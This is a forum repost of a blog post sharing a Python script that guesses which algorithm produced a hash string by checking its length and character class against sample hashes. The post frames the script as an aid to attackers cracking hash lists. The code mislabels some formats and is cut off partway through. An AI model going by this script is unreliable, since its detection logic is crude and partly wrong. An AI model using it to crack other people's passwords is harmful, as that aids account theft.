Everything posted by Nytro

  1. [h=2]Hash Detector Tool[/h]

Since 2009, when I wrote "The String Decoding Process" (published by hakin9 magazine), I have used crafted tools to automatically decode strings (some of them have been published on this blog). Decoding strings turns out to be pretty hard, especially nowadays when many encoding algorithms are commonly used in plenty of "daily life tools". Understanding what encoding we are facing becomes really important if we are analyzing hashing. Let's assume we've just got a file including hundreds of different hash strings: how do we identify what kind of hashing algorithm has been used? Having a list of hashes that could potentially "hide" passwords or important data, having the power of a brute-force machine and the right tools to attack the hash list, but not knowing what algorithm has been used, could be pretty nasty for attackers. Indeed, attackers might have a difficult time attacking hashes without knowing the generation algorithm. Surfing on this "painful wave", I decided to share a pretty Python script that helped me out in solving this specific problem. The script can be downloaded here (pastebin). The following image shows how simple the script is, and how easy it is to update it with new hashing algorithms. If you are planning to add new features to the script, please give me the diff file, so that we can create a more generic tool able to detect as many different hashing algorithms as possible.

[Image: HashFinder.py (click to enlarge)]

The script is quite modular and easy to update. What you need to do is add your new hashing function, with its own identifier, to the "algorithms" array (see the following image).

[Image: Algorithms array list: easy to expand (click to enlarge)]

After having filled up the "algorithms" array, you need to add the new function which finds out whether the string you are processing might (or might not) have been generated by the hash algorithm you've just "declared" in the "algorithms" array. The following image shows some examples already implemented.

[Image: Function that performs the detection (click to enlarge)]

Finally, in a very quick'n'dirty way, you process the input string by adding the new function to the main flow.

[Image: Adding functions to control flow (click to enlarge)]

Hope it could be useful to everybody; enjoy your new hash detector tool!
#!/usr/bin/env python logo=''' ######################################################################### # modified, adapted and encreased for www.marcoramilli.blogspot.com # #########################################################################''' algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", 
"106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} # hash.islower() minusculas # 
hash.isdigit() numerico # hash.isalpha() letras # hash.isalnum() alfanumerico def CRC16(): hs='4607' if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101020") def CRC16CCITT(): hs='3d08' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101040") def FCS16(): hs='0e5b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101060") def CRC32(): hs='b33fd057' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102040") def ADLER32(): hs='0607cb42' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102020") def CRC32B(): hs='b764a0d9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102060") def XOR32(): hs='0000003f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102080") def GHash323(): hs='80000000' if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: jerar.append("103040") def GHash325(): hs='85318985' if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: jerar.append("103020") def DESUnix(): hs='ZiY8YtDKXJwYQ' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: jerar.append("104020") def MD5Half(): hs='ae11fd697ec92c7c' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105060") def MD5Middle(): hs='7ec92c7c98de3fac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105040") def MySQL(): hs='63cea4673fd25f46' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
jerar.append("105020") def DomainCachedCredentials(): hs='f42005ec1afe77967cbc83dce1b4d714' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106025") def Haval128(): hs='d6e3ec49aa0f138a619f27609022df10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106160") def Haval128HMAC(): hs='3ce8b0ffd75bc240fc7d967729cd6637' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106165") def MD2(): hs='08bbef4754d98806c373f2cd7d9a43c4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106060") def MD2HMAC(): hs='4b61b72ead2b0eb0fa3b8a56556a6dca' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106120") def MD4(): hs='a2acde400e61410e79dacbdfc3413151' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106040") def MD4HMAC(): hs='6be20b66f2211fe937294c1c95d1cd4f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106100") def MD5(): hs='ae11fd697ec92c7c98de3fac23aba525' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106020") def MD5HMAC(): hs='d57e43d2c7e397bf788f66541d6fdef9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106080") def MD5HMACWordpress(): hs='3f47886719268dfa83468630948228f6' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106140") def NTLM(): hs='cc348bace876ea440a28ddaeb9fd3550' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106029") def RAdminv2x(): 
hs='baea31c728cbf0cd548476aa687add4b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106027") def RipeMD128(): hs='4985351cd74aff0abc5a75a0c8a54115' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106180") def RipeMD128HMAC(): hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106185") def SNEFRU128(): hs='4fb58702b617ac4f7ca87ec77b93da8a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106200") def SNEFRU128HMAC(): hs='59b2b9dcc7a9a7d089cecf1b83520350' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106205") def Tiger128(): hs='c086184486ec6388ff81ec9f23528727' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106220") def Tiger128HMAC(): hs='c87032009e7c4b2ea27eb6f99723454b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106225") def md5passsalt(): hs='5634cc3b922578434d6e9342ff5913f7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106240") def md5saltmd5pass(): hs='245c5763b95ba42d4b02d44bbcd916f1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106260") def md5saltpass(): hs='22cc5ce1a1ef747cd3fa06106c148dfa' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106280") def md5saltpasssalt(): hs='469e9cdcaff745460595a7a386c4db0c' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106300") def md5saltpassusername(): 
hs='9ae20f88189f6e3a62711608ddb6f5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106320") def md5saltmd5pass(): hs='aca2a052962b2564027ee62933d2382f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106340") def md5saltmd5passsalt(): hs='de0237dc03a8efdf6552fbe7788b2fdd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106360") def md5saltmd5passsalt(): hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106380") def md5saltmd5saltpass(): hs='d8f3b3f004d387086aae24326b575b23' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106400") def md5saltmd5md5passsalt(): hs='81f181454e23319779b03d74d062b1a2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106420") def md5username0pass(): hs='e44a60f8f2106492ae16581c91edb3ba' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106440") def md5usernameLFpass(): hs='654741780db415732eaee12b1b909119' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106460") def md5usernamemd5passsalt(): hs='954ac5505fd1843bbb97d1b2cda0b98f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106480") def md5md5pass(): hs='a96103d267d024583d5565436e52dfb3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106500") def md5md5passsalt(): hs='5848c73c2482d3c2c7b6af134ed8dd89' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
jerar.append("106520") def md5md5passmd5salt(): hs='8dc71ef37197b2edba02d48c30217b32' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106540") def md5md5saltpass(): hs='9032fabd905e273b9ceb1e124631bd67' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106560") def md5md5saltmd5pass(): hs='8966f37dbb4aca377a71a9d3d09cd1ac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106580") def md5md5usernamepasssalt(): hs='4319a3befce729b34c3105dbc29d0c40' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106600") def md5md5md5pass(): hs='ea086739755920e732d0f4d8c1b6ad8d' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106620") def md5md5md5md5pass(): hs='02528c1f2ed8ac7d83fe76f3cf1c133f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106640") def md5md5md5md5md5pass(): hs='4548d2c062933dff53928fd4ae427fc0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106660") def md5sha1pass(): hs='cb4ebaaedfd536d965c452d9569a6b1e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106680") def md5sha1md5pass(): hs='099b8a59795e07c334a696a10c0ebce0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106700") def md5sha1md5sha1pass(): hs='06e4af76833da7cc138d90602ef80070' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106720") def md5strtouppermd5pass(): hs='519de146f1a658ab5e5e2aa9b7d2eec8' if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: jerar.append("106740") def LineageIIC4(): hs='0x49a57f66bd3d5ba6abda5579c264a0e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: jerar.append("107080") def MD5phpBB3(): hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: jerar.append("107040") def MD5Unix(): hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: jerar.append("107060") def MD5Wordpress(): hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: jerar.append("107020") def MD5APR(): hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: jerar.append("108020") def Haval160(): hs='a106e921284dd69dad06192a4411ec32fce83dbb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109100") def Haval160HMAC(): hs='29206f83edc1d6c3f680ff11276ec20642881243' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109200") def MySQL5(): hs='9bb2fb57063821c762cc009f7584ddae9da431ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109040") def MySQL160bit(): hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: jerar.append("109060") def RipeMD160(): hs='dc65552812c66997ea7320ddfb51f5625d74721b' if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: jerar.append("109120") def RipeMD160HMAC(): hs='ca28af47653b4f21e96c1235984cb50229331359' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109180") def SHA1(): hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109020") def SHA1HMAC(): hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109140") def SHA1MaNGOS(): hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109220") def SHA1MaNGOS2(): hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109240") def Tiger160(): hs='c086184486ec6388ff81ec9f235287270429b225' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109080") def Tiger160HMAC(): hs='6603161719da5e56e1866e4f61f79496334e6a10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109160") def sha1passsalt(): hs='f006a1863663c21c541c8d600355abfeeaadb5e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109260") def sha1saltpass(): hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109280") def sha1saltmd5pass(): hs='860465ede0625deebb4fbbedcb0db9dc65faec30' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109300") def sha1saltmd5passsalt(): 
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109320") def sha1saltsha1pass(): hs='58714327f9407097c64032a2fd5bff3a260cb85f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109340") def sha1saltsha1saltsha1pass(): hs='cc600a2903130c945aa178396910135cc7f93c63' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109360") def sha1usernamepass(): hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109380") def sha1usernamepasssalt(): hs='00025111b3c4d0ac1635558ce2393f77e94770c5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109400") def sha1md5pass(): hs='fa960056c0dea57de94776d3759fb555a15cae87' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("1094202") def sha1md5passsalt(): hs='1dad2b71432d83312e61d25aeb627593295bcc9a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109440") def sha1md5sha1pass(): hs='8bceaeed74c17571c15cdb9494e992db3c263695' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109460") def sha1sha1pass(): hs='3109b810188fcde0900f9907d2ebcaa10277d10e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109480") def sha1sha1passsalt(): hs='780d43fa11693b61875321b6b54905ee488d7760' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109500") def sha1sha1passsubstrpass03(): hs='5ed6bc680b59c580db4a38df307bd4621759324e' if 
len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109520") def sha1sha1saltpass(): hs='70506bac605485b4143ca114cbd4a3580d76a413' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109540") def sha1sha1sha1pass(): hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109560") def sha1strtolowerusernamepass(): hs='79f575543061e158c2da3799f999eb7c95261f07' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109580") def Haval192(): hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110040") def Haval192HMAC(): hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110080") def Tiger192(): hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110020") def Tiger192HMAC(): hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110060") def MD5passsaltjoomla1(): hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("112020") def SHA1Django(): hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: jerar.append("113020") def Haval224(): 
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114040") def Haval224HMAC(): hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114080") def SHA224(): hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114020") def SHA224HMAC(): hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114060") def SHA256(): hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115020") def SHA256HMAC(): hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115120") def Haval256(): hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115040") def Haval256HMAC(): hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115140") def GOSTR341194(): hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115060") def RipeMD256(): hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: jerar.append("115080") def RipeMD256HMAC(): hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115160") def SNEFRU256(): hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115100") def SNEFRU256HMAC(): hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115180") def SHA256md5pass(): hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115200") def SHA256sha1pass(): hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115220") def MD5passsaltjoomla2(): hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("116020") def SAM(): hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: jerar.append("116040") def SHA256Django(): hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: jerar.append("117020") def RipeMD320(): 
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118020") def RipeMD320HMAC(): hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118040") def SHA384(): hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119020") def SHA384HMAC(): hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119040") def SHA256s(): hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' 
[CODE]
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
        jerar.append("120020")

def SHA384Django():
    hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
        print " [+] SHA-384(Django)"
        jerar.append("121020")

def SHA512():
